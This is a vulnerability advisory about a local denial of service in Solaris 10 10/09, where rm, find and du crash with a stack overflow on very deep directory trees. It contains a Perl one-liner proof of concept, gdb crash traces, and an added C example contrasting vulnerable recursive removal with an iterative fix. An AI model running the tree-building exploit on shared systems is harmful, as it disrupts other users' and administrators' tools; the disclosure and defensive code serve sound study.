Sun Solaris 10 filesystem rm, find, etc denial of service

Published: 2010.05.23
Credit: Maksymilian Arciemowicz
Risk: Medium
CWE: N/A
CVE: N/A
Local: Yes
Remote: No

[ Sun Solaris 10 filesystem rm(1), find(1), etc. Denial-of-service ]

Author: Maksymilian Arciemowicz
Date:
- Dis.: 17.04.2010
- Pub.: 21.05.2010

Affected Software:
- Sun Solaris 10 10/09


--- 0. Description ---
Solaris is a Unix operating system introduced by Sun Microsystems in
1992 as the successor to SunOS.

Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle
Corporation, selling computers, computer components, computer software,
and information technology services. Sun was founded on February 24,
1982. The company was headquartered in Santa Clara, California (part of
Silicon Valley), on the former west campus of the Agnews Developmental
Center.

In computing, ZFS is a combined file system and logical volume manager
designed by Sun Microsystems. The features of ZFS include support for
high storage capacities, integration of the concepts of filesystem and
volume management, snapshots and copy-on-write clones, continuous
integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.


--- 1. Sun Solaris 10 filesystem rm(1), find(1), etc. Denial-of-service ---
We can create a very deep directory tree; when we then remove it, scan it or
otherwise walk it, the affected program crashes with the symptoms of a stack
overflow, because every level of the recursive directory traversal consumes
stack space.

PoC:
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'

We need to use 1..8000 or a bigger value before the stack overflow shows up.

Result:

# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeedfc8a <_ndoprnt+12>: push %ebp

A tree of depth 8000 can still be removed without any problem:

# rm -rf X
#

But let's create a deeper one:

# perl -e '$a="Y";for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
# rm -rf Y
Segmentation fault (core dumped)

rm(1) has failed!

What went wrong? A stack overflow: the faulting instruction in each of these
traces is a push, the usual sign of a stack that has grown into its guard page.

# /usr/local/bin/gdb -q rm
(no debugging symbols found)
(gdb) r -rf Y
Starting program: /usr/bin/rm -rf Y
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03: push %ebx

# find Y CX >> /dev/null
Segmentation fault (core dumped)


find(1) also fails!

# /usr/local/bin/gdb -q find
(no debugging symbols found)
(gdb) r Y CX >> /dev/null
Starting program: /usr/bin/find Y CX >> /dev/null
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeecfc8a <_ndoprnt+12>: push %ebp
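
The pattern behind these crashes, as an added example written for this page (it is not the advisory's code and not the source of Sun's rm(1), find(1) or du(1)): a C program that builds the advisory's chain the way the Perl one-liner does, then removes it once with a recursive walker of the kind that overruns the stack and once with an iterative walker that keeps stack use constant. The function names (build_deep_tree, first_entry, rm_recursive, rm_iterative), the per-level name "Y" and the POSIX-only assumptions are mine; the code uses only POSIX calls and needs a writable working directory.

```c
/* Added example, not the advisory's or Sun's code; see the lead-in above. */
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Same as the Perl PoC: mkdir name; chdir name; depth times. Descending with chdir() lets
 * the tree grow far past PATH_MAX. Restores the cwd; returns 0 on success, -1 on error. */
static int build_deep_tree(const char *name, long depth)
{
    int start = open(".", O_RDONLY), rc = 0;
    if (start < 0) return -1;
    for (long i = 0; i < depth && rc == 0; i++)
        if (mkdir(name, 0700) != 0 || chdir(name) != 0) rc = -1;
    if (fchdir(start) != 0) rc = -1;
    close(start);
    return rc;
}

/* Copy one entry of the cwd (not . or ..) into buf: 1 found, 0 empty, -1 error.
 * The DIR is closed before returning, so one fd is open however deep we are. */
static int first_entry(char *buf, size_t n)
{
    DIR *d = opendir(".");
    if (!d) return -1;
    for (struct dirent *e; (e = readdir(d)) != NULL; ) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0) continue;
        snprintf(buf, n, "%s", e->d_name);
        closedir(d);
        return 1;
    }
    closedir(d);
    return 0;
}

/* Vulnerable pattern: recursion depth equals tree depth, each level costing a frame plus this
 * 256-byte buffer; tens of thousands of levels (the advisory used 50000) overrun a default
 * 8 MiB stack and the process dies with SIGSEGV, as rm(1) did. Call with cwd = name's parent. */
static int rm_recursive(const char *name)
{
    char child[256];
    struct stat st;
    int r;
    if (lstat(name, &st) != 0) return -1;
    if (!S_ISDIR(st.st_mode)) return unlink(name);
    if (chdir(name) != 0) return -1;
    while ((r = first_entry(child, sizeof child)) == 1)
        if (rm_recursive(child) != 0) { r = -1; break; }
    return (chdir("..") != 0 || r < 0) ? -1 : rmdir(name);
}

/* Hardened: the directories we are inside sit on a heap-allocated stack, so call-stack use is
 * constant at any depth, one fd is open at a time, and every syscall gets a short relative name. */
static int rm_iterative(const char *name)
{
    char **stack = NULL, child[256];
    size_t depth = 0;
    struct stat st;
    int r, rc = -1, start;
    if (lstat(name, &st) != 0) return -1;
    if (!S_ISDIR(st.st_mode)) return unlink(name);   /* never rescan the parent of a file */
    if ((start = open(".", O_RDONLY)) < 0) return -1;
    snprintf(child, sizeof child, "%s", name);
    for (;;) {
        if (lstat(child, &st) != 0) break;
        if (!S_ISDIR(st.st_mode)) {                       /* plain file: unlink, then rescan */
            if (unlink(child) != 0) break;
        } else {                                          /* directory: push it and enter it */
            char **grown = realloc(stack, (depth + 1) * sizeof *stack);
            if (!grown) break;
            stack = grown;
            if (!(stack[depth] = malloc(strlen(child) + 1))) break;
            strcpy(stack[depth], child);
            if (chdir(child) != 0) { free(stack[depth]); break; }
            depth++;
        }
        while ((r = first_entry(child, sizeof child)) == 0) {   /* climb out of empty dirs */
            if (chdir("..") != 0 || rmdir(stack[depth - 1]) != 0) { r = -1; break; }
            free(stack[--depth]);
            if (depth == 0) { rc = 0; break; }
        }
        if (r != 1) break;                                /* finished (rc == 0) or failed */
    }
    while (depth > 0) free(stack[--depth]);
    free(stack);
    if (fchdir(start) != 0) rc = -1;                      /* back where we started */
    close(start);
    return rc;
}

int main(int argc, char **argv)
{
    long depth = argc > 1 ? strtol(argv[1], NULL, 10) : 8000;   /* 8000: the advisory's du(1) depth */
    return build_deep_tree("Y", depth) != 0 || rm_iterative("Y") != 0;
}
```

Compile with cc -o deeptree deeptree.c and run ./deeptree 50000: the iterative remover handles a tree whose full path is 100000 bytes long, well past PATH_MAX, because it never builds a full path. Swap rm_iterative for rm_recursive in main at that depth and the program should die with SIGSEGV on a default 8 MiB stack, which is the advisory's symptom; the fix a tool needs is an explicit stack plus chdir()- or openat()-style relative operations, not a bigger stack. One caveat a practitioner should keep in mind: neither remover re-checks that a directory was not swapped for a symlink between lstat() and chdir(), so this code is not race-safe against a hostile user writing into the same tree.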


--- 2. Fix ---
No information available.

--- 3. Contact ---
Author: Maksymilian Arciemowicz


Copyright 2014, cxsecurity.com